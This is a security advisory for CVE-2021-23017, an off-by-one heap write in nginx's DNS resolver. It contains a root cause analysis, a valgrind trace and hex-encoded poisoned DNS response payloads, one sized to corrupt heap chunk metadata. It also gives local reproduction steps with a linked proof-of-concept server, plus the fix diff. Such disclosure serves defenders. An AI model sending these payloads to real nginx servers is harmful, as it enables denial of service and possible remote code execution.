Advisory X41-2021-002: nginx DNS Resolver Off-by-One Heap Write Vulnerability
=============================================================================
Severity Rating: High
Confirmed Affected Versions: 0.6.18 - 1.20.0
Confirmed Patched Versions: 1.21.0, 1.20.1
Vendor: F5, Inc.
Vendor URL: https://nginx.org/
Vendor Reference: http://mailman.nginx.org/pipermail/nginx-announce/2021/000300.html
Vector: Remote / DNS
Credit: X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
Status: Public
CVE: CVE-2021-23017
CWE: 193
CVSS Score: 8.1
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/


Summary and Impact
------------------
An off-by-one error in ngx_resolver_copy() while processing DNS responses
allows a network attacker to write a dot character ('.', 0x2E) out of bounds
in a heap allocated buffer. The vulnerability can be triggered by a DNS
response in reply to a DNS request from nginx when the resolver primitive
is configured. A specially crafted packet allows overwriting the least 
significant byte of next heap chunk metadata with 0x2E. A network attacker
capable of providing DNS responses to a nginx server can achieve
Denial-of-Service and likely remote code execution.
Due to the lack of DNS spoofing mitigations in nginx and the fact that the
vulnerable function is called before checking the DNS Transaction ID, remote
attackers might be able to exploit this vulnerability by flooding the
victim server with poisoned DNS responses in a feasible amount of time.


Root Cause Analysis
-------------------
nginx DNS resolver (core/ngx_resolver.c) is used to resolve hostnames via DNS
for several modules when the resolver primitive is set.
ngx_resolver_copy() is called to validate and decompress each DNS domain name
contained in a DNS response, receiving the network packet as input and a
pointer to the name being processed, and returning a pointer to a newly
allocated buffer containing the uncompressed name on success. This is done
in two steps,
1) The uncompressed domain name sizelenis calculated and the input packet is
validated, discarding names containing more than 128 pointers or containing
pointers that fall out of the input buffer boundaries.
2) An output buffer is allocated, and the uncompressed name is copied into it.
A mismatch between size calculation in part 1 and name decompression in part 2
leads to an off-by-one error inlen, allowing to write a dot character one byte
off name->data boundaries.
The miscalculation happens when the last part of the compressed name contains a
pointer to a NUL byte. While the calculation step only accounts dots between
labels, the decompression step writes a dot character every time a label has
been processed and next character is not NUL. When a label is followed by a
pointer that leads to a NUL byte, the decompression procedure will:

// 1) copy the label to the output buffer,
 ngx_strlow(dst, src, n);
            dst += n;
            src += n;
// 2) read next character,
            n = *src++;
// 3) as its a pointer, its not NUL,
            if (n != 0) {
// 4) so a dot character that was not accounted for is written out of bounds
                *dst++ = '.';
            }
// 5) Afterwards, the pointer is followed,
        if (n & 0xc0) {
            n = ((n & 0x3f) << 8) + *src;
            src = &buf[n];
            n = *src++;
        }
// 6) and a NULL byte is found, signaling the end of the function
        if (n == 0) {
            name->len = dst - name->data;
            return NGXOK;
        }


If the calculated size happens to align with the heap chunk size, the dot
character, written out of bounds, will overwrite the least significant byte
of next heap chunk size metadata. This might modify the size of the next heap
chunk, but also overwrite 3 flags, resulting in PREV_INUSE being cleared
and IS_MMAPPED being set:


==7863== Invalid write of size 1
==7863==    at 0x137C2E: ngx_resolver_copy (ngx_resolver.c:4018)
==7863==    by 0x13D12B: ngx_resolver_process_a (ngx_resolver.c:2470)
==7863==    by 0x13D12B: ngx_resolver_process_response (ngx_resolver.c:1844)
==7863==    by 0x13D46A: ngx_resolver_udp_read (ngx_resolver.c:1574)
==7863==    by 0x14AB19: ngx_epoll_process_events (ngx_epoll_module.c:901)
==7863==    by 0x1414D4: ngx_process_events_and_timers (ngx_event.c:247)
==7863==    by 0x148E57: ngx_worker_process_cycle (ngx_process_cycle.c:719)
==7863==    by 0x1474DA: ngx_spawn_process (ngx_process.c:199)
==7863==    by 0x1480A8: ngx_start_worker_processes (ngx_process_cycle.c:344)
==7863==    by 0x14952D: ngx_master_process_cycle (ngx_process_cycle.c:130)
==7863==    by 0x12237F: main (nginx.c:383)
==7863==  Address 0x4bbcfb8 is 0 bytes after a block of size 24 alloc'd
==7863==    at 0x483E77F: malloc (vg_replace_malloc.c:307)
==7863==    by 0x1448C4: ngx_alloc (ngx_alloc.c:22)
==7863==    by 0x137AE4: ngx_resolver_alloc (ngx_resolver.c:4119)
==7863==    by 0x137B26: ngx_resolver_copy (ngx_resolver.c:3994)
==7863==    by 0x13D12B: ngx_resolver_process_a (ngx_resolver.c:2470)
==7863==    by 0x13D12B: ngx_resolver_process_response (ngx_resolver.c:1844)
==7863==    by 0x13D46A: ngx_resolver_udp_read (ngx_resolver.c:1574)
==7863==    by 0x14AB19: ngx_epoll_process_events (ngx_epoll_module.c:901)
==7863==    by 0x1414D4: ngx_process_events_and_timers (ngx_event.c:247)
==7863==    by 0x148E57: ngx_worker_process_cycle (ngx_process_cycle.c:719)
==7863==    by 0x1474DA: ngx_spawn_process (ngx_process.c:199)
==7863==    by 0x1480A8: ngx_start_worker_processes (ngx_process_cycle.c:344)
==7863==    by 0x14952D: ngx_master_process_cycle (ngx_process_cycle.c:130)


More information about general exploitability of a similar bug class found in
* Chrome OS exploit: one byte overflow and symlinks
  https://googleprojectzero.blogspot.com/2016/12/chrome-os-exploit-one-byte-overflow-and.html
* Project Zero's Poisoned NULL Byte
  https://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
* Hiroki Matsukama's House of Einherjar
  https://www.slideshare.net/codeblue_jp/cb16-matsukuma-en-68459606
  https://www.youtube.com/watch?v=tq3mPjsl-H0
Given the rich interaction opportunities in nginx with user controller data
and the documented precedents this bug is considered exploitable for remote
code execution on some operating systems and architectures.


Attack Vector Analysis
----------------------

There are several ways in which a DNS response can trigger the vulnerability.
First, nginx must have sent a DNS request and must be waiting for a response.
Then, a poisoned name can be injected in several parts of a DNS response:
* DNS Questions QNAME,
* DNS Answers NAME,
* DNS Answers RDATA for CNAME and SRV responses,
Keep in mind that the vulnerable function can be hit several times while
processing a response, effectively performing several off-by-one writes,
by crafting a response with several poisoned QNAME, NAME or RDATA values.
Furthermore, when the attacker delivers a poisoned CNAME, it will be
resolved recursively, triggering an additional OOB write during
ngx_resolve_name_locked() call to ngx_strlow() (ngx_resolver.c:594)
and additional OOB reads during ngx_resolver_dup() (ngx_resolver.c:790)
and ngx_crc32_short() (ngx_resolver.c:596).
An example payload of DNS response for a 'example.net' request, containing
a poisoned CNAME:

bcb881800001000100000000076578616d706c65036e657400001c0001c00c0005000100000e10000b0141c004
         ^                                                                        |   ^ pointer to position 0x04 -|
         NULL byte <----------------------------------------------------------------------------------------------|
                                                                                  |
                                                                                  ^ 1 byte label

A slightly different payload (the one in poc.py) fills enough bytes to
overwrite the nextchunk.mchunk_size least significant byte with a dot:

bcb881800001000100000000076578616d706c65036e657400001c0001c00c0005000100000e10000b18414141414141414141414141414141414141414141414141c004
                                                                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                                                                                    |
                                                                                    24 bytes label


A 24 bytes label leads to a 24 bytes buffer allocated, which is filled with 24
bytes + an out of bounds dot character.


Fix / Workarounds
-----------------

Allocating an extra byte for the spurious dot character written at the end
of the poisoned domain names mitigates the issue.


--- ngxresolver.c  2021-04-06 15:59:50.293734070 +0200
+++ src/nginx-1.19.8/src/core/ngxresolver.c    2021-04-06 15:54:10.232975235 +0200
@@ -3943,7 +3928,7 @@
     ngx_uint_t   i, n;
 
     p = src;
-    len = -1;
+    len = 0;
 
     /*
      * compression pointers allow to create endless loop, so we set limit;
@@ -3986,7 +3971,7 @@
         return NGX_OK;
     }
 
-    if (len == -1) {
+    if (len == 0) {
         ngx_str_null(name);
         return NGX_OK;
     }


Official fix can be found at http://nginx.org/download/patch.2021.resolver.txt


Proof-of-Concept
----------------

A dummy DNS server delivering a poisoned payload that triggers this
vulnerability can be downloaded from https://github.com/x41sec/advisories/blob/master/X41-2021-002/poc.py
The described vulnerability can be tested by running nginx with the provided
config as follows under valgrind (https://www.valgrind.org/):

   valgrind --trace-children=yes objs/nginx -p ../runtime -c conf/reverse-proxy.conf

Then run the DNS server (will listen on port 1053 by default):

   python poc.py

and trigger a request to the server:

   curl http://127.0.0.1:8080/

Depending on the heap layout when the bug triggers, the malloc mitigations
might detect or not the effect. Several ways of showing up in the logs arise:

corrupted size vs. prev_size
2021/04/16 13:35:15 [alert] 2501#0: worker process 2502 exited on signal 6 (core dumped)
malloc(): invalid next size (unsorted)
2021/04/16 13:35:34 [alert] 2525#0: worker process 2526 exited on signal 6 (core dumped)


Nevertheless, valgrind and AdressSanitizer will always detect the memory
corruption.


nginx config used
-----------------

daemon off;
http{
    access_log logs/access.log;
    server{
        listen 8080;
        location / {
            resolver 127.0.0.1:1053;
            set $dns http://example.net;
            proxy_pass $dns;
        }
    }
}
events {
    worker_connections  1024;
}


Timeline
--------

2021-04-30 Issue reported to maintainers
2021-05-17 Issue reported to distros mailing list
2021-05-18 CVE assigned
2021-05-25 Public disclosure

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.